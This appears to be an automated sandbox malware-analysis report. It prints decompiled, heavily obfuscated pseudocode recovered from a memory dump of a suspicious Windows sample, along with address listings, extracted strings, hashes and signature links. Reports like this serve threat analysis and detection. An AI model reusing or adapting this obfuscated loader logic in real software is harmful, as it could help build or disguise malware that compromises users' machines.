                                                          0x00495583
                                                          0x00495583
                                                          0x00495522
                                                          0x00495532
                                                          0x00000000
                                                          0x00000000
                                                          0x00495534
                                                          0x0049553d
                                                          0x0049553f
                                                          0x0049553f
                                                          0x00000000
                                                          0x0049553d
                                                          0x0049539b
                                                          0x004953a0
                                                          0x004953a6
                                                          0x00000000
                                                          0x004953a6
                                                          0x00495385

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CNHMWL.dll$EtwEventWriteStartScenario$WindowsCodecs.dll$credssp.dll$ddrawex.dll$nshhttp.dll$ul$$wmi.dll
                                                          • API String ID: 0-709279457
                                                          • Opcode ID: 1aaf8a045b0130d67bed1241285cbba3287cbe92992b1982ea4fb91050ea73c3
                                                          • Instruction ID: 582e2f61d25609144b53039c7a616bf619c71b4bf2e67c25aabb22d5be17acb4
                                                          • Opcode Fuzzy Hash: 1aaf8a045b0130d67bed1241285cbba3287cbe92992b1982ea4fb91050ea73c3
                                                          • Instruction Fuzzy Hash: F851F079F407069FCB01DFB8E894ADD7FB2EB39310F14407A8984AB356E679054AEB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004D3903 Relevance: 9.0, Strings: 7, Instructions: 234COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E004D3903(char _a8) {
				void* _v8;
				char* _v12;
				char _v20;
				intOrPtr _v8252;
				intOrPtr _v8256;
				intOrPtr _v8264;
				intOrPtr _v8276;
				intOrPtr _v8280;
				char _t33;
				char _t34;
				intOrPtr* _t36;
				intOrPtr _t37;
				char* _t38;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				char _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t55;
				void* _t81;
				void* _t99;
				signed char _t103;
				signed int _t110;
				signed char _t113;
				signed int _t116;
				intOrPtr _t121;
				signed int _t122;
				void* _t127;
				short _t129;
				unsigned short _t131;
				unsigned short _t134;
				short _t137;
				signed int _t141;
				void* _t142;
				void* _t143;

				_t33 = _a8;
				 *0x50845b =  *0x50845b + _t127;
				 *0x508583 = _t33;
				_t55 =  *0x50896b; // 0x0
				 *0x508bb3 =  *0x508bb3 - _t55;
				 *0x508cdf =  *0x508cdf + _t55;
				_v8 = _t33;
				 *0x50afe1 =  *0x50afe1 - _t33;
				_t34 = _v8;
				_push(_t34);
				 *0x50afe1 =  *0x50afe1 - _t34;
				_t134 = 0xffffffffff48ec14;
				 *0x50afe5 = _t34;
				if(_t34 >= 0) {
					 *0x508753 =  *0x508753 + _t48 - 0x73b54;
					_t34 =  *0x50899b;
					 *0x5080ea =  *0x5080ea +  !0x31a8e1;
					if(_t99 <= _t99) {
						_t99 = _t99 + 1;
					}
				}
				_t113 = 0x95fb;
				if(0x95da == 0) {
					 *0x508224 = 0x95fb;
					_t134 = _t134 - 0xbd67;
					 *0x50afe3 =  *0x50afe3 + _t34;
					 *0x508351 =  *0x508351 + _t134;
					 *0x50afe5 = _t34;
				}
				_pop(_t36);
				_t37 =  *_t36;
				 *0x508f9f = 0x3a9ae2;
				_t103 = (0x70a6 >> 0x70a6) + _t113;
				_v8280 = _t37;
				 *0x50afe6 = _t37;
				_t129 = 0x50afe5;
				if(_t37 <= 0xc3e) {
					 *0x50afd9 =  *0x50afd9 + _t37;
					 *0x508913 = _t37;
					 *0x5080f6 =  *0x5080f6 - 0xffffffffffffc560;
					 *0x50afdc =  *0x50afdc + 0xffffffffffffc560;
					_t103 = _t103 + _t103;
				}
				if(_t103 >= _t103) {
					L12:
					_t113 = 0x13c35;
					_t134 = (_t134 >> _t103) + (_t134 >> _t103) + (_t134 >> _t103) + (_t134 >> _t103);
					_t129 = 0;
					if(_t37 > 0) {
						 *0x508673 = _t37;
					}
					 *0x508caf = 0x2f45fb;
					_v8 = _v8 - _t103;
					goto L15;
				} else {
					_t103 = _t103 - 0x72bd;
					if(_t103 != _t103) {
						L15:
						_v8252 = 0;
						_v8 = _t37;
						 *0x508216 = _t113;
						_t38 = _v8;
						 *0x508a5f = _t38;
						_v12 = _t38;
						_t137 = _t129;
						_t131 = _t134;
						_t40 = _v12;
						_v8256 = 0;
						if((_t113 & 0x000000ac) == 0) {
							 *0x50835d =  *0x50835d - _t137;
							_t131 = 0xd745d5;
							 *0x50840b = _t40;
							if(_t40 >= 0x14) {
							}
							 *0x508146 = 0x74;
						}
						 *0x5081e4 = 0x82b0;
						_t116 =  *0x50821a; // 0x92c5
						 *0x508266 =  *0x508266 - 0xb1ff;
						_v8264 = 0;
						_t109 = 0x6f89ac;
						 *0x5081ea =  *0x5081ea + (_t116 | 0x00008ca9);
						 *0x50afe3 =  *0x50afe3 + _t40;
						_t42 = _t40;
						 *0x5081fe = 0x9226;
						_t121 =  *0x508232; // 0x9a66
						_v8276 = 0;
						_v8 = _t42;
						 *0x509a97 =  *0x509a97 + _t121;
						_t43 =  *0x50afe1; // -128
						 *0x508288 =  *0x508288 - 0xb1ff;
						_t141 = 0xbf + _t131;
						if(_t131 < 0) {
							 *0x50836b =  *0x50836b - _t43 + 0xf8;
							 *0x508138 = 0x6f89ac;
							_t109 =  *0x508170; // 0x2575
						}
						_t122 = _t121 - 0xa9;
						_t44 = _v8;
						_t81 = "tsbyuv.dll" - _t44;
						if(_t44 >= 0x249a2d) {
							L24:
							_t122 = 0x9a;
							 *0x50822a = 0;
							_t141 = _t141 ^ 0x0000b6bb;
							goto L25;
						} else {
							if((_t81 + 0x00000001 | 0x00000049) < (_t81 + 0x00000001 | 0x00000049)) {
								L25:
								_t134 = _t141 + 0xb20759;
								 *0x50afe5 = _t44;
								if(_v8280 != 1) {
									_t110 =  !_t109;
									_push(_t44);
									if(_t44 >= 0) {
										 *0x50ab28 =  *0x50ab28 + _t131;
									}
									_t45 =  *0x50afe6; // -97
									 *0x50afd8 =  *0x50afd8 - _t45;
									_pop(_t46);
									 *0x508204 = _t122;
									if((_t122 & 0x0092ed10) <= 0) {
										_t134 = _t134 + 0xa823d7;
									}
									_v8 = _t46;
									 *0x508192 = _t110;
									 *0x50822c = 0x97a7;
									_push(E004D522F);
									_t99 = E004C48BB;
									goto L1;
								}
								_v8 = _t44;
								_push(_t109);
								_push(_t109);
								_push(_t109);
								_push(0x4d3c66);
								_t109 = E00464241;
								goto __ecx;
							}
							_t109 = _t109 + 1;
							goto L24;
						}
					}
					goto L12;
				}
				L1:
				_push(_t142);
				_t142 = _t143;
				_t143 = _t143 + 0xfffffff4;
				_t48 =  &_v20;
				_v12 =  &_v20;
				_push(_v12);
				_push(E004C48DB);
				goto ( *0x50892b);
			}







































                                                          0x004d390d
                                                          0x004d3910
                                                          0x004d3916
                                                          0x004d391d
                                                          0x004d3923
                                                          0x004d3929
                                                          0x004d3932
                                                          0x004d3935
                                                          0x004d393b
                                                          0x004d3950
                                                          0x004d3951
                                                          0x004d395a
                                                          0x004d3960
                                                          0x004d3967
                                                          0x004d396e
                                                          0x004d3976
                                                          0x004d3982
                                                          0x004d398e
                                                          0x004d3990
                                                          0x004d3990
                                                          0x004d3991
                                                          0x004d399b
                                                          0x004d39a4
                                                          0x004d39a6
                                                          0x004d39ad
                                                          0x004d39b2
                                                          0x004d39b8
                                                          0x004d39bf
                                                          0x004d39bf
                                                          0x004d39cc
                                                          0x004d39cf
                                                          0x004d39d7
                                                          0x004d39eb
                                                          0x004d39ed
                                                          0x004d39f5
                                                          0x004d39fa
                                                          0x004d3a00
                                                          0x004d3a02
                                                          0x004d3a08
                                                          0x004d3a14
                                                          0x004d3a1b
                                                          0x004d3a21
                                                          0x004d3a21
                                                          0x004d3a26
                                                          0x004d3a34
                                                          0x004d3a38
                                                          0x004d3a42
                                                          0x004d3a49
                                                          0x004d3a4d
                                                          0x004d3a54
                                                          0x004d3a54
                                                          0x004d3a61
                                                          0x004d3a67
                                                          0x00000000
                                                          0x004d3a28
                                                          0x004d3a28
                                                          0x004d3a2f
                                                          0x004d3a73
                                                          0x004d3a79
                                                          0x004d3a8c
                                                          0x004d3a8f
                                                          0x004d3a96
                                                          0x004d3aa0
                                                          0x004d3ab2
                                                          0x004d3ab5
                                                          0x004d3ab5
                                                          0x004d3aba
                                                          0x004d3abf
                                                          0x004d3acc
                                                          0x004d3ad6
                                                          0x004d3ae1
                                                          0x004d3ae7
                                                          0x004d3aee
                                                          0x004d3aee
                                                          0x004d3b0c
                                                          0x004d3b0c
                                                          0x004d3b1f
                                                          0x004d3b29
                                                          0x004d3b34
                                                          0x004d3b3f
                                                          0x004d3b49
                                                          0x004d3b55
                                                          0x004d3b6b
                                                          0x004d3b88
                                                          0x004d3b8d
                                                          0x004d3b94
                                                          0x004d3ba3
                                                          0x004d3bad
                                                          0x004d3bb0
                                                          0x004d3bb6
                                                          0x004d3bbc
                                                          0x004d3bc3
                                                          0x004d3bc8
                                                          0x004d3bcd
                                                          0x004d3be9
                                                          0x004d3bf3
                                                          0x004d3bf3
                                                          0x004d3bfd
                                                          0x004d3c00
                                                          0x004d3c08
                                                          0x004d3c10
                                                          0x004d3c1e
                                                          0x004d3c21
                                                          0x004d3c24
                                                          0x004d3c2b
                                                          0x00000000
                                                          0x004d3c12
                                                          0x004d3c18
                                                          0x004d3c31
                                                          0x004d3c31
                                                          0x004d3c37
                                                          0x004d3c4e
                                                          0x004d51d0
                                                          0x004d51d2
                                                          0x004d51d7
                                                          0x004d51d9
                                                          0x004d51d9
                                                          0x004d51df
                                                          0x004d51e5
                                                          0x004d51eb
                                                          0x004d51ec
                                                          0x004d51f9
                                                          0x004d51fb
                                                          0x004d51fb
                                                          0x004d5201
                                                          0x004d5204
                                                          0x004d5216
                                                          0x004d5220
                                                          0x004d5225
                                                          0x00000000
                                                          0x004d5225
                                                          0x004d3c54
                                                          0x004d3c57
                                                          0x004d3c58
                                                          0x004d3c59
                                                          0x004d3c5a
                                                          0x004d3c5f
                                                          0x004d3c64
                                                          0x004d3c64
                                                          0x004d3c1a
                                                          0x00000000
                                                          0x004d3c1a
                                                          0x004d3c10
                                                          0x00000000
                                                          0x004d3a2f
                                                          0x004c48bb
                                                          0x004c48bb
                                                          0x004c48bc
                                                          0x004c48be
                                                          0x004c48c1
                                                          0x004c48c4
                                                          0x004c48c7
                                                          0x004c48ca
                                                          0x004c48d5

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B5d$EtwEventWriteStartScenario$RemoveClipboardFormatListener$RemoveVectoredExceptionHandler$WindowsCodecs.dll$ZwLoadKeyEx$tsbyuv.dll
                                                          • API String ID: 0-346616746
                                                          • Opcode ID: f93faa5925a4031faacf54fcacbeb45936be5d8250dc0b5ce807dc6edd9279d1
                                                          • Instruction ID: 81c64e18934f344d071f6ad680b9b21ec7efa0f80eceb16081ff0d3bc9b62132
                                                          • Opcode Fuzzy Hash: f93faa5925a4031faacf54fcacbeb45936be5d8250dc0b5ce807dc6edd9279d1
                                                          • Instruction Fuzzy Hash: 0A91E679A14742CFC700DF79EC94AED3BB0EB39324B04516BC888A7762EA750949E706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004C6560 Relevance: 9.0, Strings: 7, Instructions: 211COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 79%
                                                          			E004C6560(void* __ebx, void* __ecx, short __edx, unsigned int __edi, signed int __esi) {
				char _t34;
				char _t35;
				void* _t39;
				intOrPtr _t42;
				char _t47;
				signed char _t48;
				char _t50;
				void* _t53;
				signed char _t54;
				void* _t62;
				intOrPtr _t86;
				void* _t89;
				signed char _t106;
				signed char _t107;
				short _t110;
				signed char _t113;
				signed char _t125;
				intOrPtr _t126;
				intOrPtr _t135;
				unsigned short _t140;
				unsigned short _t142;
				void* _t144;

				_t140 = __esi;
				_t136 = __edi;
				_t120 = __edx;
				_t34 =  *(_t144 - 8);
				_t62 = "CNHMWL.dll" + 0x405c - 0x5021;
				 *(_t144 - 8) = __ecx;
				if(__ecx > __ecx) {
					L3:
					 *0x50afdc =  *0x50afdc + _t62 + 0x31a3;
					_t106 = 0x68d3;
				} else {
					_t106 = _t144 - 8;
					 *0x5081c2 = __edx;
					_t135 =  *0x50820c; // 0x96b5
					_t120 = _t135 - 0x95a690;
					if((__esi & 0x0000b6a0) < 0) {
						_t136 = __edi + 1;
						 *0x50afe5 = _t34;
						_t62 = (0x92943 >> _t106) + _t34;
						goto L3;
					}
				}
				 *0x508192 = _t106;
				 *0x508210 = _t120 - 0xffffffffffff704a;
				 *0x50822c = _t140;
				 *((intOrPtr*)(_t144 - 0x20)) = _t34;
				 *(_t144 - 8) = _t34;
				 *0x509423 =  *0x509423 + _t106;
				 *0x50820e =  *0x50820e + 0x92;
				 *0x509c1b =  *0x509c1b;
				_t35 =  *(_t144 - 8);
				_push( *((intOrPtr*)(_t144 - 0x20)));
				_t125 = 0xa397;
				 *0x5086d1 =  *0x5086d1 + _t136;
				 *0x509d7f =  *0x509d7f + _t140;
				 *0x50afe1 = _t35;
				_t39 = _t35;
				if(_t136 < 0) {
				}
				 *0x50afe3 =  *0x50afe3 - _t39;
				_t42 = _t39;
				_push( *((intOrPtr*)(_t144 - 0x18)));
				_t107 = _t125;
				if((_t125 & 0x00008f26) <= 0) {
				}
				 *((intOrPtr*)(_t144 - 0xc)) = _t42;
				if(L004ACD1C(_t42 - _t42 + _t42 - _t42, _t107, _t125, _t136, _t140) != 8) {
					 *(_t144 - 8) = 0x319e1b;
					_t107 = _t125;
					_t125 = 0x8e0d;
				}
				_t47 = E004B323C( *((intOrPtr*)(_t144 - 0xc)), _t140);
				if(_t47 == 0) {
					 *0x5087cb = _t47;
					 *(_t144 - 8) = _t47;
					 *0x508144 = _t107;
					_t48 =  *(_t144 - 8);
					_t109 = _t107 + _t107 + 1;
					_t126 =  *0x508216; // 0x9a2d
					_t142 = _t140 - 0xa62f3d >> _t107 + _t107 + 1;
					if((_t48 & _t48) >= 0) {
						 *0x50afe6 = _t48;
					}
					 *(_t144 - 8) = _t48;
					E004AE02F(_t48, 0xb8d6b, _t109, _t126 + 0x8861ea, _t136, _t142, _t126 + 0x8861ea);
					_t50 =  *(_t144 - 8);
					 *0x5088e7 =  *0x5088e7 + _t50;
					if(0x171ad6 < 0x171ad6) {
						 *0x50810e =  *0x50810e + 0x171ad6;
					}
					_t110 =  *0x508178; // 0xffff
					 *0x50afe1 = _t50;
					 *(_t144 - 8) = _t50;
					 *0x508156 = _t110;
					return  *((intOrPtr*)(_t144 - 0x24));
				} else {
					if(_t47 > 0x10) {
						L15:
						_t125 = 0xa62d;
						_t140 = _t140 >> _t107;
						goto L16;
					} else {
						 *0x50afd9 =  *0x50afd9 + _t47;
						 *0x508ad7 = _t47;
						_t89 = 0x402f56;
						if(0x402f56 >= _t107) {
							L18:
							_t125 = 0x9774;
							 *0x50822a = 0x9774;
							_t89 = _t89 + _t47;
							_t140 = _t140 + 0xab3117;
							 *0x50afe5 = _t47;
						} else {
							if(_t107 < _t107) {
								_t107 = 0x7ec1;
								 *0x5081c0 = _t125;
								goto L15;
							}
							L16:
							_t136 = _t136 >> _t107;
							 *0x508783 = _t47;
							_t86 =  *0x5089cf; // 0x3710000
							_t89 =  !(_t86 - 0x30f4) +  !(_t86 - 0x30f4);
							if(_t107 + _t107 == _t107 + _t107) {
								goto L18;
							}
						}
					}
					_push( *((intOrPtr*)(_t144 - 0x18)));
					 *(_t144 - 8) = _t89;
					 *(_t144 - 8) = _t89;
					_t113 =  *0x508144; // 0x779d
					 *0x508196 = _t113 - 0x74;
					_t53 = _t47;
					 *(_t144 - 8) = _t53;
					_t54 =  *(_t144 - 8);
					L004BB1E9();
					_push(_t54);
					_push(0);
					_push(1);
					_push(_t140);
					_push(E004C67C8);
					_push(E004BE12C);
					return _t54;
				}
			}

























                                                          0x004c6560
                                                          0x004c6560
                                                          0x004c6560
                                                          0x004c6560
                                                          0x004c6575
                                                          0x004c657a
                                                          0x004c6580
                                                          0x004c65c7
                                                          0x004c65cc
                                                          0x004c65d8
                                                          0x004c6582
                                                          0x004c6582
                                                          0x004c6585
                                                          0x004c658f
                                                          0x004c6596
                                                          0x004c65a1
                                                          0x004c65a9
                                                          0x004c65aa
                                                          0x004c65c5
                                                          0x00000000
                                                          0x004c65c5
                                                          0x004c65a1
                                                          0x004c65dc
                                                          0x004c65eb
                                                          0x004c65f2
                                                          0x004c65fb
                                                          0x004c65fe
                                                          0x004c6601
                                                          0x004c660c
                                                          0x004c6613
                                                          0x004c6619
                                                          0x004c661c
                                                          0x004c6622
                                                          0x004c6630
                                                          0x004c6638
                                                          0x004c663e
                                                          0x004c6652
                                                          0x004c6656
                                                          0x004c6656
                                                          0x004c667a
                                                          0x004c6688
                                                          0x004c6689
                                                          0x004c668c
                                                          0x004c6694
                                                          0x004c6694
                                                          0x004c669f
                                                          0x004c66ad
                                                          0x004c66bb
                                                          0x004c66cb
                                                          0x004c66cd
                                                          0x004c66cd
                                                          0x004c66d7
                                                          0x004c66de
                                                          0x004c6edc
                                                          0x004c6ee8
                                                          0x004c6eeb
                                                          0x004c6ef2
                                                          0x004c6ef8
                                                          0x004c6efc
                                                          0x004c6f09
                                                          0x004c6f10
                                                          0x004c6f12
                                                          0x004c6f17
                                                          0x004c6f1e
                                                          0x004c6f28
                                                          0x004c6f32
                                                          0x004c6f35
                                                          0x004c6f41
                                                          0x004c6f43
                                                          0x004c6f43
                                                          0x004c6f50
                                                          0x004c6f60
                                                          0x004c6f66
                                                          0x004c6f69
                                                          0x004c6f79
                                                          0x004c66e4
                                                          0x004c66e8
                                                          0x004c671a
                                                          0x004c6721
                                                          0x004c6725
                                                          0x00000000
                                                          0x004c66ea
                                                          0x004c66ea
                                                          0x004c66f0
                                                          0x004c66fb
                                                          0x004c6703
                                                          0x004c675f
                                                          0x004c6766
                                                          0x004c676a
                                                          0x004c6771
                                                          0x004c6773
                                                          0x004c6779
                                                          0x004c6708
                                                          0x004c670a
                                                          0x004c670c
                                                          0x004c6710
                                                          0x00000000
                                                          0x004c6710
                                                          0x004c672a
                                                          0x004c6732
                                                          0x004c673f
                                                          0x004c6744
                                                          0x004c6751
                                                          0x004c6758
                                                          0x00000000
                                                          0x004c675a
                                                          0x004c6758
                                                          0x004c6703
                                                          0x004c6781
                                                          0x004c6784
                                                          0x004c6787
                                                          0x004c678a
                                                          0x004c6794
                                                          0x004c67a4
                                                          0x004c67a9
                                                          0x004c67af
                                                          0x004c67b2
                                                          0x004c67b7
                                                          0x004c67b8
                                                          0x004c67ba
                                                          0x004c67bc
                                                          0x004c67bd
                                                          0x004c67c2
                                                          0x004c67c7
                                                          0x004c67c7

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *^<$B5d$C)$CNHMWL.dll$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$RemoveClipboardFormatListener$tsbyuv.dll
                                                          • API String ID: 0-3402622854
                                                          • Opcode ID: fca71e418edadd488b00160e7d8a2ce755ad889d099f9dafa92e5627abffc055
                                                          • Instruction ID: 033d6f8f2a3dc0217f3f1176fd8236e4e969868ad09cf7dbb87bcd63d3e66f87
                                                          • Opcode Fuzzy Hash: fca71e418edadd488b00160e7d8a2ce755ad889d099f9dafa92e5627abffc055
                                                          • Instruction Fuzzy Hash: 38712579A447469FCB00EFB8EC50BDD3BB1EF39324B08416AC884D7366E6790549D719
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004EEAF6 Relevance: 8.9, Strings: 7, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 16%
                                                          			E004EEAF6(void* __ebx, void* __ecx, void* __edx, void* __edi) {
				char* _v16;
				char* _v20;
				intOrPtr _v24;
				char _t13;
				intOrPtr _t25;
				intOrPtr _t39;
				char _t42;
				char* _t65;
				intOrPtr _t87;
				intOrPtr _t109;
				intOrPtr _t111;
				unsigned short _t118;

				_t113 = __edi;
				_t79 = __ecx;
				_t13 =  *0x508573;
				 *0x508060 =  *0x508060 - _t13;
				 *0x50afe1 = _t13;
				 *0x50afe5 = _t13;
				 *0x50afe5 = _t13;
				 *0x50afda =  *0x50afda - __ebx;
				_t65 = __ebx - 0x39;
				_v16 = _t65;
				 *0x5081e0 = 0x88a6;
				 *0x50a686 =  *0x50a686 + 0x50afe3;
				_t120 = 0xea9d7e;
				_t25 =  *0x5083eb; // 0x7fb784a0
				 *0x50803c =  *0x50803c + _t25;
				if(_t25 < 0xb49e4) {
					L9:
					_v24 = _v24 - 0x3976ee;
					_t81 = _t79 - 0x61 + 0x5cd239;
					 *0x50818c = _t81;
					_t120 = _t120 - _t113;
					 *0x50afd8 = 0;
					goto L10;
				} else {
					 *0x50afda =  *0x50afda + _t65;
					_v20 = _t65;
					 *0x50afdd =  *0x50afdd - _v24;
					 *0x508146 =  *0x508146 + __ecx;
					if(0 != 0) {
						L11:
					} else {
						_t42 =  *0x50afe1; // -128
						 *0x50afe3 = _t42;
						_t118 = __edi + 0xd995 >> 0x82da;
						_v16 = 0xe256a;
						if(0 <= 0) {
							L7:
							 *0x50aa68 =  *0x50aa68 - _t118;
							_t113 = _t118 - 0xf7;
							goto L8;
						} else {
							_t81 = 0x7421;
							 *0x5081b8 = 0x130;
							 *0x509b8f =  *0x509b8f;
							_t120 = 0x1997b34;
							if(0xffffffffffffff32 > 0) {
								L10:
								 *0x50afdd =  *0x50afdd - _t81;
								goto L11;
							} else {
								_t113 = _t118 + _t118;
								if(_t113 >= 0x61760) {
									_v20 = "psxdllsvr.dll";
									if(0 >= 0x7421) {
										 *0x50816c = 0x5af27b;
										_t111 =  *0x5081ba; // 0x510c
										 *0x508206 = _t111 - 0x856008;
										_t120 = 0;
										 *0x50afe3 = 0xbf;
										goto L7;
									}
									L8:
									_t87 =  *0x50816e; // 0xfe20
									_t79 = _t87 - 0x7638;
									_t109 =  *0x508208; // 0xcbda
									 *0x509d03 =  *0x509d03 - _t109;
									 *0x50afe1 = "credssp.dll";
									_t25 = 0xd8;
									goto L9;
								}
							}
						}
					}
				}
				 *0x50afe3 = 0xb2;
				_t39 =  *0x50afe3; // -68
				return _t39;
			}















                                                          0x004eeaf6
                                                          0x004eeaf6
                                                          0x004eeafe
                                                          0x004eeb03
                                                          0x004eeb10
                                                          0x004eeb1c
                                                          0x004eeb21
                                                          0x004eeb2f
                                                          0x004eeb53
                                                          0x004eeb64
                                                          0x004eeb6b
                                                          0x004eeb76
                                                          0x004eeb7c
                                                          0x004eeb84
                                                          0x004eeb89
                                                          0x004eeb9d
                                                          0x004eed07
                                                          0x004eed1f
                                                          0x004eed27
                                                          0x004eed2d
                                                          0x004eed48
                                                          0x004eed52
                                                          0x00000000
                                                          0x004eeba3
                                                          0x004eebaa
                                                          0x004eebb0
                                                          0x004eebb8
                                                          0x004eebbe
                                                          0x004eebd0
                                                          0x004eed88
                                                          0x004eebd6
                                                          0x004eebdb
                                                          0x004eebe1
                                                          0x004eebf4
                                                          0x004eec00
                                                          0x004eec17
                                                          0x004eecae
                                                          0x004eecb0
                                                          0x004eecb7
                                                          0x00000000
                                                          0x004eec1d
                                                          0x004eec1d
                                                          0x004eec21
                                                          0x004eec33
                                                          0x004eec3d
                                                          0x004eec48
                                                          0x004eed57
                                                          0x004eed77
                                                          0x00000000
                                                          0x004eec4e
                                                          0x004eec4e
                                                          0x004eec5a
                                                          0x004eec6a
                                                          0x004eec71
                                                          0x004eec79
                                                          0x004eec86
                                                          0x004eec93
                                                          0x004eec9c
                                                          0x004eeca0
                                                          0x00000000
                                                          0x004eecac
                                                          0x004eecbe
                                                          0x004eecd3
                                                          0x004eecda
                                                          0x004eece6
                                                          0x004eeced
                                                          0x004eecf3
                                                          0x004eed05
                                                          0x00000000
                                                          0x004eed05
                                                          0x004eec5a
                                                          0x004eec48
                                                          0x004eec17
                                                          0x004eebd0
                                                          0x004eed91
                                                          0x004eed99
                                                          0x004eeda0

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CNHMWL.dll$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll$psxdllsvr.dll$tsbyuv.dll$v9
                                                          • API String ID: 0-3726062485
                                                          • Opcode ID: 7702ea9b9ee6390fd48320498088f7d6678a2c176d0edb11103b8b6029925a23
                                                          • Instruction ID: b4cc7390207cf5d829ec20c4b467acbd4e96f6ef6c36d2225fb2fceb0149fe7c
                                                          • Opcode Fuzzy Hash: 7702ea9b9ee6390fd48320498088f7d6678a2c176d0edb11103b8b6029925a23
                                                          • Instruction Fuzzy Hash: B5513B6EA547834FC701DF79EC58ADD3BB2EB7A320304426A8895D77A2E634050FE751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B0A6E Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CryptDataHash
                                                          • String ID: EtwEventWriteStartScenario$G_3$PenIMC_v0400.dll$tsbyuv.dll
                                                          • API String ID: 4245837645-4064654828
                                                          • Opcode ID: 8f9755d861849df69b7d0bdbb4267d615db46671d1214a747bc0268c38bdbe25
                                                          • Instruction ID: aa6fada98bfcc48c0147b7c8f433f3947d95b6604434a5d3181bcbd7cf1eb662
                                                          • Opcode Fuzzy Hash: 8f9755d861849df69b7d0bdbb4267d615db46671d1214a747bc0268c38bdbe25
                                                          • Instruction Fuzzy Hash: 53219FB8A183869FCB01CFB4E8D5AEEBFB0EB39314F14546AD484D7352D2340A49D715
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004EB7A3 Relevance: 7.6, Strings: 6, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 49%
                                                          			E004EB7A3(signed int __eax, void* __ebx, short __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _t26;
				signed int _t29;
				signed int _t33;
				signed int _t37;
				short _t74;
				unsigned short _t76;
				signed int _t82;
				short _t83;
				short _t85;
				void* _t90;
				void* _t93;
				void* _t96;

				_t93 = __esi;
				_t90 = __edi;
				_t82 = __edx;
				_t74 = __ecx;
				 *(_t96 - 8) = __eax;
				_t26 =  *(_t96 - 8);
				 *(_t96 - 0x44) = _t26;
				if((__edx & 0x0000a9e5) < 0) {
					L5:
					_t74 = _t74 - 0x75f495;
					 *0x5081d0 =  *0x5081d0 - _t82;
					_t82 = _t82 + _t82;
					L6:
					_t83 = _t82 + _t82;
					 *0x50a4bb =  *0x50a4bb - _t93;
					_push( *(_t96 - 0x44));
					 *(_t96 - 8) = _t26;
					_t29 =  *(_t96 - 8);
					_t76 = 0x6612 >> 0x6612;
					if(0x6612 >> 0x6612 >= 0x6612 >> 0x6612) {
						 *0x509983 =  *0x509983 + 0x8d7e;
						_t83 =  *0x50823c; // 0x0
						 *0x508288 =  *0x508288 + _t93 - 0xbccc;
						 *0x50afe3 =  *0x50afe3 + _t29;
						if(_t29 > 0) {
							 *0x508377 = _t29;
						}
					}
					 *(_t96 - 8) = _t29;
					if(0x474463 == _t76) {
						_t76 =  *0x508170; // 0x2575
						 *0x5081c0 = _t83;
					}
					_push( *((intOrPtr*)(_t96 - 0x48)));
					_t33 =  *(_t96 - 8);
					 *(_t96 - 8) = _t33;
					 *(_t96 - 0xc) =  !_t33;
					_t85 = _t83 - 0xa1;
					_t37 =  *(_t96 - 8);
					if(0 >= 0x3bfc) {
						L16:
						 *0x50afe6 = _t37;
						goto L17;
					} else {
						if("RtlEthernetStringToAddressW" < "RtlEthernetStringToAddressW") {
							L15:
							 *0x5081e6 = _t85;
							 *0x50afe1 =  *0x50afe1 + _t37;
							goto L16;
						}
						if(0x7222 >> 0x7222 < 0x7222 >> 0x7222) {
							L17:
							_push(E004EB962);
							_push(E004C4AF4);
							return _t37;
						}
						goto L15;
					}
				}
				if(__esi >= 0) {
					 *0x50a9d6 =  *0x50a9d6 - __esi;
				}
				 *0x508010 =  *0x508010 + _t26;
				if( !(0xfd - _t26 + 0x1d05 - 1) <= 0x365041) {
					goto L6;
				} else {
					 *0x508148 = _t74;
					 *0x508166 = _t74;
					goto L5;
				}
			}















                                                          0x004eb7a3
                                                          0x004eb7a3
                                                          0x004eb7a3
                                                          0x004eb7a3
                                                          0x004eb7aa
                                                          0x004eb7b2
                                                          0x004eb7bc
                                                          0x004eb7c4
                                                          0x004eb80d
                                                          0x004eb80d
                                                          0x004eb813
                                                          0x004eb81a
                                                          0x004eb81d
